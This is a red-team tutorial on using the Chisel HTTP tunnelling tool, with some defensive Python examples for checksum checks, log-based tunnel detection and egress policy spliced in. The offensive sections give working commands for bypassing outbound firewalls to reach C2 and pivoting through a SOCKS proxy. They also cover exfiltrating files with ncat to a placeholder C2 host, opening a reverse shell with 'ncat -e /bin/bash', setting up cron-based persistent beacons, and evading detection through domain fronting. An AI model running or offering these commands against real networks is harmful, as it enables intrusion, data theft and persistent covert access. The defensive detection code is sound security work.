Hey there, fellow hackers and pen testers! If you’re reading this article, you’re probably passionate about staying ahead in the game and mastering the tools that help us win big in cybersecurity. Today, I’ll be walking you through a powerful technique I’ve used in many red team engagements—tunneling traffic using Chisel, a lightweight tool that leverages HTTP to move SSH traffic across restricted networks.
Chisel is a fast, reliable, and versatile tool that can help us bypass firewalls, intrusion detection systems, and other security measures by tunneling our traffic over HTTP. It’s an invaluable resource when you’re on a red team engagement or just exploring the boundaries of a network.
In this article, we’ll explore the world of Chisel, its functionality, setup, and use cases. I’ll provide plenty of examples and code snippets along the way, and by the end of this article, you’ll be a Chisel expert, ready to tunnel your way to victory!
So, let’s dive in!
Understanding Chisel
Chisel is a powerful open-source tool for creating secure, encrypted tunnels between two systems. Developed by jpillora, Chisel is written in Go, making it easily portable across different platforms. At its core, Chisel runs an SSH session inside a WebSocket connection that begins as an ordinary HTTP request, which allows it to traverse firewalls and security devices typically configured to allow HTTP traffic.
One of Chisel’s greatest strengths is its versatility. It supports forward and reverse tunnels and SOCKS5 proxying and can be easily combined with other tools like Metasploit, Cobalt Strike, and even custom payloads.
Before we delve into the installation and setup process, it’s essential to understand the main components of Chisel:
- Chisel Server: The server component listens for incoming client connections and sets up tunnels based on the client’s requests. The server can be hosted on any system with a public IP address or a domain, making it ideal for use with cloud infrastructure providers like AWS, GCP, or Azure.
- Chisel Client: The client component connects to the Chisel server and requests specific tunnels to be set up. The client can be run on any system, including the target machine, your local machine, or a system within the target network.
With these components in mind, let’s install and set up Chisel.
Chisel Installation and Setup
To install Chisel, visit the GitHub repository (https://github.com/jpillora/chisel) and download the latest binary release for your operating system. Chisel is available for Linux, macOS, and Windows.
After downloading the binary, make it executable by running the following command:
chmod +x chisel
Now, you should be able to run the Chisel binary by simply executing:
./chisel
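Before making a downloaded binary executable, check it against the checksum list published with the release. The following is an added Python example, not code from the original article or from the Chisel project; it assumes a sha256sum-style checksum file (one "<hex>  <filename>" line per artifact) and uses a constructed stand-in file, since the real checksum file name and contents differ between releases.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def parse_checksums(text):
    """Parse sha256sum-style lines ('<hex>  <filename>') into {filename: hex}."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError(f"malformed checksum line: {line!r}")
        digest, name = parts
        # sha256sum prefixes binary-mode entries with '*'; drop it.
        expected[name.lstrip("*")] = digest.lower()
    return expected


def sha256_of_file(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with Path(path).open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(binary, checksums_text):
    """Return True only if the file's SHA-256 matches its published entry."""
    binary = Path(binary)
    digest = parse_checksums(checksums_text).get(binary.name)
    if digest is None:
        return False  # no published checksum for this file name: do not trust it
    return hmac.compare_digest(sha256_of_file(binary), digest)


def demo():
    """Constructed scenario: verify an intact download, then an altered one."""
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for a release binary, not a real build.
        binary = Path(tmp) / "chisel_linux_amd64"
        binary.write_bytes(b"\x7fELF constructed stand-in for the chisel binary\n")
        checksums = f"{sha256_of_file(binary)}  {binary.name}\n"
        intact = verify_download(binary, checksums)
        # Simulate a download that was modified or truncated in transit.
        binary.write_bytes(b"\x7fELF constructed stand-in, altered after download\n")
        tampered = verify_download(binary, checksums)
    return intact, tampered


if __name__ == "__main__":
    print(demo())  # (True, False)
```

Run verify_download against the real binary and the release's checksum text; a False result means the file name has no published entry or the bytes differ, and either case is a reason not to run it.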
Chisel Use Cases
Let’s look at four common ways Chisel can help in real-world red team scenarios:
Bypassing Firewall Restrictions
One of the most common use cases for Chisel is bypassing firewall restrictions. This can be helpful when a target network has strict outbound rules that prevent you from establishing connections to your command and control (C2) infrastructure. You can bypass these restrictions and maintain control of compromised systems by tunneling traffic through an allowed protocol like HTTP.
To bypass firewall restrictions with Chisel, first, set up the Chisel server on a publicly accessible system. Run the following command on the server:
./chisel server -p 8080 --reverse
Next, run the Chisel client on the target machine. The client will connect to the Chisel server and request a reverse tunnel:
./chisel client http://<server-ip>:8080 R:2222:localhost:22
Now, you can SSH into the target machine through the Chisel server:
ssh -p 2222 user@<server-ip>
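From the defender's side, the property that makes this work is also what makes it visible: the tunnel starts as an HTTP request that upgrades to a WebSocket and then stays open for as long as the client is connected. The Python example below is added here and is not part of the article or of Chisel. It scans constructed egress-proxy log lines (the JSON field names are assumptions, not a real product's schema) for upgraded connections that carry the Chisel subprotocol identifier, go to bare IP addresses, stay open for a long time, move bulk data outbound, or start outside working hours. The subprotocol string chisel-v3 is the value current Chisel clients send in Sec-WebSocket-Protocol; confirm it against the release in use, and tune the thresholds and working hours to the site.

```python
import json
from datetime import datetime, timezone
from ipaddress import ip_address

# Constructed egress-proxy log lines (JSON per line). Field names are assumptions.
SAMPLE_LOG = """\
{"ts":"2024-05-02T10:14:03Z","src":"10.20.1.15","dst_host":"www.example.com","dst_port":443,"method":"GET","path":"/","status":200,"upgrade":"","ws_protocol":"","duration_s":0.4,"bytes_out":812,"bytes_in":15420}
{"ts":"2024-05-02T10:15:11Z","src":"10.20.1.42","dst_host":"203.0.113.10","dst_port":8080,"method":"GET","path":"/","status":101,"upgrade":"websocket","ws_protocol":"chisel-v3","duration_s":5400,"bytes_out":9120334,"bytes_in":40211}
{"ts":"2024-05-02T02:31:45Z","src":"10.20.1.77","dst_host":"203.0.113.25","dst_port":80,"method":"GET","path":"/","status":101,"upgrade":"websocket","ws_protocol":"","duration_s":1800,"bytes_out":120000,"bytes_in":300000}
{"ts":"2024-05-02T11:02:09Z","src":"10.20.1.15","dst_host":"chat.example.com","dst_port":443,"method":"GET","path":"/ws","status":101,"upgrade":"websocket","ws_protocol":"","duration_s":120,"bytes_out":4000,"bytes_in":9000}
"""

CHISEL_SUBPROTOCOL = "chisel-v3"   # assumption: confirm against the Chisel release in use
LONG_LIVED_S = 600                 # constructed threshold: upgraded connection open >= 10 min
BULK_OUT_BYTES = 5_000_000         # constructed threshold: outbound volume per connection
WORK_HOURS = range(7, 20)          # constructed site policy: 07:00-19:59 UTC


def is_raw_ip(host):
    """True when the destination was given as an IP literal rather than a name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def analyse_record(rec):
    """Return (severity, reasons) for one log record; severity is None when clean."""
    reasons = []
    ws = rec["status"] == 101 and rec["upgrade"].lower() == "websocket"
    if ws and rec["ws_protocol"] == CHISEL_SUBPROTOCOL:
        reasons.append("chisel subprotocol in Sec-WebSocket-Protocol")
    if ws and is_raw_ip(rec["dst_host"]):
        reasons.append("websocket upgrade to a bare IP address")
    if ws and rec["duration_s"] >= LONG_LIVED_S:
        reasons.append(f"long-lived upgraded connection ({rec['duration_s']:.0f}s)")
    if rec["bytes_out"] >= BULK_OUT_BYTES:
        reasons.append(f"bulk outbound volume ({rec['bytes_out']} bytes)")
    ts = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00")).astimezone(timezone.utc)
    if ws and ts.hour not in WORK_HOURS:
        reasons.append("upgrade outside work hours")
    if not reasons:
        return None, []
    # The protocol identifier alone is decisive; otherwise several weak signals
    # together raise the severity.
    high = any(r.startswith("chisel") for r in reasons) or len(reasons) >= 3
    return ("high" if high else "medium"), reasons


def scan_log(text):
    """Parse JSON log lines and return one finding per suspicious connection."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        severity, reasons = analyse_record(rec)
        if severity:
            findings.append({
                "src": rec["src"],
                "dst": f"{rec['dst_host']}:{rec['dst_port']}",
                "severity": severity,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"], f["src"], "->", f["dst"], "; ".join(f["reasons"]))
```

On the constructed sample the first record is ordinary browsing and the last is a short WebSocket to a named host, so neither is reported; the two connections to bare IP addresses are reported, the one carrying the Chisel subprotocol with every signal present. Only the subprotocol check is specific to Chisel; the other signals also catch tunnels that strip or rename that header, which is why they are combined rather than used alone.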
Remote Port Forwarding
To use Chisel for remote port forwarding, first start the Chisel server with reverse tunnels enabled:
./chisel server -p 8080 --reverse
Next, on the target machine, run the Chisel client with an R: remote so that the listening port is opened on the server:
./chisel client http://<server-ip>:8080 R:8081:localhost:80
Now, access the target’s HTTP service through port 8081 on the Chisel server:
curl http://<server-ip>:8081
Reverse Port Forwarding
To set up reverse port forwarding, run:
./chisel server -p 8080 --reverse
And on your local machine:
./chisel client http://<server-ip>:8080 R:8081:localhost:80
This opens port 8081 on the Chisel server and forwards it to your local HTTP service, so systems on the target network that can reach the server access it with:
curl http://<server-ip>:8081
SOCKS Proxy
To use Chisel as a SOCKS5 proxy whose connections exit from the target machine, start the server with reverse tunnels enabled:
./chisel server -p 8080 --reverse
Then on the target machine, request a reverse SOCKS remote:
./chisel client http://<server-ip>:8080 R:socks
With R:socks the SOCKS5 listener is opened on the Chisel server, on port 1080 by default; the client’s output shows the exact address.
On your local machine, install and configure proxychains:
sudo apt-get install proxychains
Edit /etc/proxychains.conf and add:
socks5 <server-ip> <socks5-port>
Then:
proxychains curl http://internal-website.local
Real-World Examples
Exfiltrating Data from a Restricted Network
Start the Chisel server:
./chisel server -p 8080 --reverse
On the target:
./chisel client http://<c2-ip>:8080 R:4444:localhost:4444
Then:
cat sensitive-data.txt | ncat -l -p 4444
On your C2 server:
ncat -v <c2-ip> 4444 > exfiltrated-data.txt
Gaining Access to an Internal Web Application
Server:
./chisel server -p 8080 --reverse
Client (on the target, which can resolve and reach the internal host):
./chisel client http://<server-ip>:8080 R:8081:internal-webapp.local:80
Access the app:
curl http://<server-ip>:8081
Establishing a Chisel Beacon for Persistent C2 Communication
Server:
./chisel server -p 8080 --reverse
Client:
./chisel client http://<c2-ip>:8080 R:8888:localhost:8888 --keepalive 5m
Server listener:
ncat -l -p 8888
Target command execution:
ncat -e /bin/bash <c2-ip> 8888
Periodic Chisel Beacon with Cron
Server:
./chisel server -p 8080 --reverse
Client cron job:
./chisel client http://<c2-ip>:8080 --reverse --timeout 30s
Crontab:
*/5 * * * * /path/to/chisel client http://<c2-ip>:8080 --reverse --timeout 30s >/dev/null 2>&1
Optional SOCKS proxy on server:
./chisel server -p 8080 --reverse --socks5
Tips and Tricks for Advanced Chisel Usage
- Combine Chisel with Metasploit, Cobalt Strike, or custom payloads.
- Use domain fronting for stealth via CDNs like Cloudflare.
- Add authentication with --auth user:pass to prevent misuse.
- Use stunnel to wrap Chisel in TLS for added encryption.
- Watch for traffic patterns—avoid large data spikes or weird hours.
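The domain-fronting and TLS tips above are the same properties a network team builds egress policy around. The example below is an added Python sketch of such a policy as a TLS-terminating forward proxy could apply it; it is not from the article or the Chisel project, and the request fields, allowlist and rules are constructed. It denies requests whose TLS server name disagrees with the HTTP Host header (the mismatch domain fronting relies on, observable only where the proxy terminates TLS) and restricts WebSocket upgrades to an approved set of hosts over TLS.

```python
from dataclasses import dataclass


@dataclass
class EgressRequest:
    """Constructed view of one outbound request as a TLS-terminating proxy sees it."""
    src: str
    sni: str            # TLS server name from the ClientHello ("" for plain HTTP)
    host: str           # HTTP Host header, possibly with a :port suffix
    port: int
    upgrade: str = ""   # value of the Upgrade header, if present


# Constructed site policy: only these hosts may receive WebSocket upgrades.
WS_ALLOWLIST = {"chat.example.com", "collab.example.com"}


def hostname(host):
    """Strip an optional :port suffix and normalise case (IPv6 literals not handled)."""
    return host.split(":")[0].lower()


def decide(req):
    """Return ("allow"|"deny", reason) for one request under the constructed policy."""
    host = hostname(req.host)
    # Domain fronting: the TLS layer names one host (a CDN edge) while the HTTP
    # layer asks for another. A legitimate client sends the same name in both.
    if req.sni and req.sni.lower() != host:
        return "deny", f"SNI/Host mismatch ({req.sni} vs {host})"
    if req.upgrade.lower() == "websocket":
        # Long-lived upgraded connections are where HTTP tunnels live; allow them
        # only to services the site knows need them, and only over TLS.
        if host not in WS_ALLOWLIST:
            return "deny", f"websocket upgrade to non-allowlisted host {host}"
        if req.port != 443:
            return "deny", f"websocket upgrade to {host} must use TLS on 443"
    return "allow", "policy passed"


SAMPLE_REQUESTS = [  # constructed traffic
    EgressRequest("10.20.1.15", "chat.example.com", "chat.example.com", 443, "websocket"),
    EgressRequest("10.20.1.42", "cdn.example.net", "hidden.example.org", 443, "websocket"),
    EgressRequest("10.20.1.77", "", "203.0.113.10:8080", 8080, "websocket"),
    EgressRequest("10.20.1.15", "www.example.com", "www.example.com", 443),
]


def evaluate(requests):
    """Apply the policy to each request and return (src, decision, reason) tuples."""
    return [(r.src, *decide(r)) for r in requests]


if __name__ == "__main__":
    for src, decision, reason in evaluate(SAMPLE_REQUESTS):
        print(f"{decision:5} {src:12} {reason}")
```

Of the constructed requests, the upgrade to an approved chat host and the plain HTTPS fetch pass; the request whose SNI names a CDN edge but whose Host names another site is refused as fronting, and the upgrade to a bare IP on port 8080 is refused because it is not on the allowlist. The SNI/Host comparison only has meaning on a proxy that terminates TLS; without that, the Host header is not visible and the policy falls back to the allowlist alone.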
Conclusion
Chisel is a stealthy, lightweight, and versatile tunneling tool perfect for red team operations. Its ability to bypass firewall restrictions, forward and reverse ports, and create SOCKS proxies makes it an invaluable asset for offensive security work.
In this article, we covered Chisel installation, practical use cases, real-world scenarios, and advanced usage tips. Now that you’ve got Chisel in your toolbox, try setting up a lab and practicing these techniques in a safe environment!
Remember—use this knowledge ethically and legally. Stay sharp, and happy hacking!